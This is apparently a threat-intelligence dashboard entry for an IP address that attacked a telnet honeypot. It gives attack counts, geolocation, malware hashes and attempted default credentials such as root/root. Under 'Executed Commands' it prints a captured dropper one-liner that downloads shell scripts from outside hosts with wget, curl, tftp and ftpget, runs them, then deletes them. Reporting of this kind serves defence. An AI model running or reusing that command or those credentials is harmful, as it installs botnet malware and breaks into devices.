TROYANOSYVIRUS
Active Threat β€’ LOW

35.203.187.22

First Detection3/30/2026
Last Activity3/30/2026
ISPGoogle LLC
🎯
36
Total Attacks
πŸ”Œ
1
Ports
πŸ“‘
1
Attack Types
🦠
2
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
The Dalles
ASN
AS396982
ISP
Google LLC

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

2ee89245c6dd3edd3e14...β†’cbe4713b10ed5f1536c7...β†’

Attempted Credentials

πŸ”root/root
4x
πŸ”root/(empty)
3x
πŸ”root/icatch99
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *1x

Risk Assessment

25
/100
LowMediumHighCritical